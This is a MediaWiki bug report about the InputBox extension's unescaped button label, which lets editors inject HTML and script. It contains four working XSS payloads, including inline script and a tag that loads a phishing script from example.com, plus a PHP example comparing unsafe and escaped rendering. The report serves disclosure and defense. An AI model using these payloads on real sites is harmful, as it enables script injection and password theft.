
Insecure HTML can be added
Closed, Resolved | Public

Description

Author: conrad.irwin

Description:
As this does no HTML escaping it is possible for editors to embed script tags in the page, with all of the security problems that that entails.

I found this problem on Wiktionary and Wikipedia, so I am guessing it is a universal problem.

For example...

<inputbox>
type=search
buttonlabel=Hello" onclick="alert('gotcha');return false
searchbuttonlabel=Dig deeper
</inputbox>

<inputbox>
type=search
buttonlabel=Hello" /><!-- Actually this is quite useful...
searchbuttonlabel=Dig deeper--> <br class="
</inputbox>

<inputbox>
type=search
buttonlabel=Hello" /><script type="text/javascript">document.body.innerHTML="You Smell";</script>
searchbuttonlabel=Oops
</inputbox>

<inputbox>
type=search
buttonlabel=Hello" /><script type="text/javascript" src="http://www.example.com/phish.js" />
searchbuttonlabel=Now you are really for it
</inputbox>

This could have dire consequences, as it would be trivial to get people's wiki passwords (in the name of the unified login scheme) or other less obvious hacks.


Version: unspecified
Severity: critical
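
The missing escaping described in the report, as an added example that is not code from the report or from the InputBox extension: it renders a submit button with and without attribute escaping and parses both results to show which attributes the HTML parser sees. The function names are hypothetical, and the label is the first `buttonlabel` value quoted above.

```php
<?php
// Added illustration; function names are hypothetical, not the extension's own code.

// Vulnerable pattern: the editor-supplied label is concatenated into the
// attribute value as-is, so a double quote in the label ends the attribute.
function renderButtonUnsafe(string $label): string {
    return '<input type="submit" value="' . $label . '" />';
}

// Hardened pattern: escape for an HTML attribute context, quotes included,
// so the label can only ever be the text of the value attribute.
function renderButtonSafe(string $label): string {
    return '<input type="submit" value="'
        . htmlspecialchars($label, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8')
        . '" />';
}

// Parse the markup and return the attributes found on the first <input>.
function inputAttributes(string $html): array {
    $doc = new DOMDocument();
    libxml_use_internal_errors(true);   // keep parser warnings off the output
    $doc->loadHTML('<html><body>' . $html . '</body></html>');
    libxml_clear_errors();

    $attrs = [];
    $input = $doc->getElementsByTagName('input')->item(0);
    if ($input !== null) {
        foreach ($input->attributes as $attr) {
            $attrs[$attr->name] = $attr->value;
        }
    }
    return $attrs;
}

// First buttonlabel value from the report.
$label = 'Hello" onclick="alert(\'gotcha\');return false';

echo "unsafe:\n";
print_r(inputAttributes(renderButtonUnsafe($label)));

echo "safe:\n";
print_r(inputAttributes(renderButtonSafe($label)));
```

With the unescaped rendering the parser reports an `onclick` attribute taken from the label; with the escaped rendering it reports only `type` and `value`, and `value` holds the whole label as text.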

Details

Reference
bz11877

Event Timeline

bzimport raised the priority of this task from to Medium. Nov 21 2014, 10:00 PM
bzimport set Reference to bz11877.
bzimport added a subscriber: Unknown Object (MLST).